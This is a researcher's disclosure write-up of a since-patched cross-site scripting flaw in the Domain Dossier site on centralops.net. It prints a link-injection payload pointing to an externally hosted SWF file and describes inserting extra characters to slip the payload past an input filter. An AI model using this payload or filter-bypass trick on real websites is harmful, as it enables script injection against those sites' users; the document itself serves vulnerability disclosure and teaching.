Acknowledgement: I would like to thank Gavin from Hexillion Group (http://hexillion.com/) for patching this issue within few hours.
Case Study: Recently working on a domain dossier (http:///www.centralops.net) website for my ongoing research, I came across with interesting scenario where I have to bypass some glitches in the code (or filter) to execute the XSS code. I wanted to perform link injection with payload :
"/>&<a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>
|Error due to Injection !|
The error I encountered was: "has multiple items separated by spaces, but only one input is allowed at a time. Domain Dossier will continue with"
Original : "/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>Note: I used "/", "//" and "_" characters to treat the payload as one value and pushed it. As a result injection occurs as follows:
|Successful Rendering of XSS Payload !|
|Successful Execution of Payload !|
What do we learn from this?
During past years, I feel its more important to understand how exactly the attack is executed (analyzing the underlying components) . As per my experience, one attack vector might not work in all target environments, so we have to build a new one every time. In a number of earlier scenarios, I have seen that if we tamper the whitespaces between HTML attributes and tags, the code fails to render properly in the application. But, in this case study, we are required to embed additional characters in the payload for passing the payload as one value to the application.
(1) Understand the error and develop appropriate combinations to overcome nuances (or bypass XSS filters).
(2) Design XSS payload as per target environment.